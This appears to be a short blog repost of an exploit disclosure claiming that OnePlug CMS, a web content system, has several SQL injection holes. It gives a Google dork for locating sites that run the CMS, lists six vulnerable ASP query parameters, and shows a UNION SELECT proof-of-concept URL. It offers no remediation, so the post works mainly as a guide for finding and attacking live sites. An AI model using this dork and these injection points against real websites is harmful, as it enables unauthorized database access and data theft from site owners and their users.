OnePlug CMS Vulnerable to Multiple SQL Injection
Title : OnePlug CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.webpromo-inc.com/
Found by : p0pc0rn
Dork : intext:"Powered by OnePlug CMS"
SQL - Microsoft Access
-------------------------------
Parameters
index.asp?Team_ID=[SQL]
service_info.asp?Service_ID=[SQL]
product_details.asp?Product_ID=[SQL]
product_list.asp?Category_ID=[SQL]
product_info.asp?Product_ID=[SQL]
category_list.asp?Category_ID=[SQL]
more..
POC
---
http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a
thanks,
-p0pc0rn-
0 comments:
Post a Comment